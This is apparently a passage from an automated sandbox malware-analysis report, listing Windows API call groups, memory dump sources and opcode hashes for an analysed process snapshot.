                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1029679093-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9ec3d20ab0dd8e20048405e9f3bd833b6b6b2b8e5c4997659b394a7f033f9ca0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 24783f406bb209fcac5a4922ea2f46fc766327038a6ee0b1d4c29bfc9eff551a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ec3d20ab0dd8e20048405e9f3bd833b6b6b2b8e5c4997659b394a7f033f9ca0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D216632B001095BDB20DBA5DCC5BBFBBF8EF44354F080569A605E3181D674EA44AAA1
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 557e9159feae8441d0e71b4b025cd71a1788152f4208369cb8b3af98fe290d17
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ab79b9a4302171615d22642315ad2ab4b44e381bc7261f441369fd27be1807e8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 557e9159feae8441d0e71b4b025cd71a1788152f4208369cb8b3af98fe290d17
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111E2B1A01508BBDB249B259C8AFBE7669EFC1334F144119E802D61D0DF70DD02F791
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F09822
                                                                                                                                                                                                                                                                                                                                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F092EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0982A
                                                                                                                                                                                                                                                                                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F09841
                                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00F0986E
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 15a0e2a6ccd1e10e670c46bcf1565b4642b5a0bd714208c6df0b4dc8c60a74bf
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2ae95fb0636e2c764980d4c832a37bf7dc60fdda7c44b3369850734598eba471
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15a0e2a6ccd1e10e670c46bcf1565b4642b5a0bd714208c6df0b4dc8c60a74bf
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8112B31508208AFDF259B21EC49EBF77A9EB85725F15C029F401D22E2EBB09C41FA61
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00F09962,00000000,?,00000000,00EFCF94,00000000,?), ref: 00EE727F
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EE7286
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00EE72AF
                                                                                                                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL ref: 00EE72B6
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 85b74421905de3af044abfe98c8fd008d225f8e50f246397ce44f40c0f2ecd7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8f5e769c25fc9b7e2a446cf0a2ccf48cf2f7ab22a511e84dd842c2dbc04287d2
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85b74421905de3af044abfe98c8fd008d225f8e50f246397ce44f40c0f2ecd7a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94115EB12096848BC724AF769805B763FE5EF89314F14540CF2DADB2A1DB34D803EB61
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00EE6231,00000000,00000000,55099697), ref: 00EE630C
                                                                                                                                                                                                                                                                                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EE6313
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 8535fd4ead3fe021071a1f432947cdb0f3862b9fefe9d5294db44655cf1e0881
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 754b5ff1aa1301b2e3751a077edd26c7aee7ac38a42457084ab5839c6d946998
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8535fd4ead3fe021071a1f432947cdb0f3862b9fefe9d5294db44655cf1e0881
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 471188313019A843CA245B136814B7F7746EFE4BE4F09102CE906BB290CF209C03A692
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00EEBDB3,00000000,?), ref: 00EEDD37
                                                                                                                                                                                                                                                                                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EEDD3E
                                                                                                                                                                                                                                                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00EEDD53
                                                                                                                                                                                                                                                                                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00EEDD5A
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 39662ce985559452fb44aef533bdc7f981d099201ca6b64317121a81f620a70b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 90900ae1bf8898c5993bb57014adc7cc81eaf02a0db874c67bd32125f77a4d5d
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39662ce985559452fb44aef533bdc7f981d099201ca6b64317121a81f620a70b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E01287620924D9BC7219B52EC88FD97769FBC076AF205125F505E7050DB71CC15DBA0
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084B9
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084C6
• FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084EA
• SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00EE8A51), ref: 00F084F2
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
• String ID:
• API String ID: 1033415088-0
APIs
  • Part of subcall function 00EF0060: wcschr.MSVCRT ref: 00EF006C
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00EF5678
• _open_osfhandle.MSVCRT ref: 00EF568C
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00EF56A2
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00F0122B
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
• String ID:
• API String ID: 22757656-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00F022F8), ref: 00F02514
• RtlFreeHeap.NTDLL ref: 00F0251B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00F022F8), ref: 00F02539
• RtlFreeHeap.NTDLL ref: 00F02540
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00EE885E), ref: 00EE8B9D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EE885E), ref: 00EE8BA4
  • Part of subcall function 00EEA9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00EEA9C5), ref: 00EEA9D8
  • Part of subcall function 00EEA9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00EEA9F3
  • Part of subcall function 00EEA9D4: RtlAllocateHeap.NTDLL(00000000), ref: 00EEA9FA
  • Part of subcall function 00EEA9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 00EEAA09
  • Part of subcall function 00EEA9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00EEAA12
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00EE885E), ref: 00EFB5B5
• RtlFreeHeap.NTDLL ref: 00EFB5BC
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: Heap$Process$EnvironmentFreeStrings$AllocAllocatememcpy
• String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3480822025-0
APIs
  • Part of subcall function 00EF6F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00EF6F4F
• __set_app_type.MSVCRT ref: 00EF6872
• __p__fmode.MSVCRT ref: 00EF6888
• __p__commode.MSVCRT ref: 00EF6896
• __setusermatherr.MSVCRT ref: 00EF68B7
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
APIs
• _get_osfhandle.MSVCRT ref: 00F09F24
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00F0449C,?,?,00000001,?), ref: 00F09F2C
• _get_osfhandle.MSVCRT ref: 00F09F42
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00F0449C,?,?,00000001,?), ref: 00F09F4A
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
APIs
• _get_osfhandle.MSVCRT ref: 00EE824E
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE8256
• _get_osfhandle.MSVCRT ref: 00EE8264
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EE826C
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00EE729C), ref: 00EE72CF
• RtlFreeHeap.NTDLL ref: 00EE72D6
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00EE72DF
• RtlFreeHeap.NTDLL ref: 00EE72E6
Memory Dump Source
• Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1310c4a6087f494eb6dffc9a9cdca9d4ada0e14e8b84831bd70a83dbf965e306
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3b3043e0b17ee1b2142342a1be41fb27751fab062e446cffcb4420a8d47f4480
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1310c4a6087f494eb6dffc9a9cdca9d4ada0e14e8b84831bd70a83dbf965e306
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAD0C932405514ABD7703FE0BC0EF863E28EF49333F010401F205820608ABC4862AF62
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF1AE2
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT()",?,)",00000000,-00000105,?,00000000,00000000), ref: 00EF1BA4
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID: )"
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-1962620678
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 70b71a9192041d7958f6f9cc54eff9a836b8278789b6a79ea04e30bd3d355a85
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2c43b04ddd86db460b3c1b0ef4120bb3187689dfb61242e936daf9f19228d464
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70b71a9192041d7958f6f9cc54eff9a836b8278789b6a79ea04e30bd3d355a85
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D81C570A0021DCBDB28DF68EC956B9B7F4FB44308F1554A9EA45F7261EB349D81DB40
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA62F: wcschr.MSVCRT ref: 00EEA635
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEC570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00EEC5BD
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEC570: RtlFreeHeap.NTDLL ref: 00EEC5C4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEC570: _setjmp3.MSVCRT ref: 00EEC630
                                                                                                                                                                                                                                                                                                                                                      • _wcsupr.MSVCRT ref: 00EFC21F
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1A47: memset.MSVCRT ref: 00EF1AE2
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1A47: ??_V@YAXPAX@Z.MSVCRT()",?,)",00000000,-00000105,?,00000000,00000000), ref: 00EF1BA4
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
                                                                                                                                                                                                                                                                                                                                                      • String ID: FOR$ IF
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3818062306-2924197646
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0bce5544a098b85daba870053cb3a2170209a4899832e8fdfaec096ba99eb454
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b723f47b05a294d7c027a95a7935f2547d62cba1378870568310a059340c21ab
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bce5544a098b85daba870053cb3a2170209a4899832e8fdfaec096ba99eb454
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A651692170065E46EB246B7ADC513B732E2EF90758B386429DA06FB2A2FB61DD42C340
                                                                                                                                                                                                                                                                                                                                                      APIs
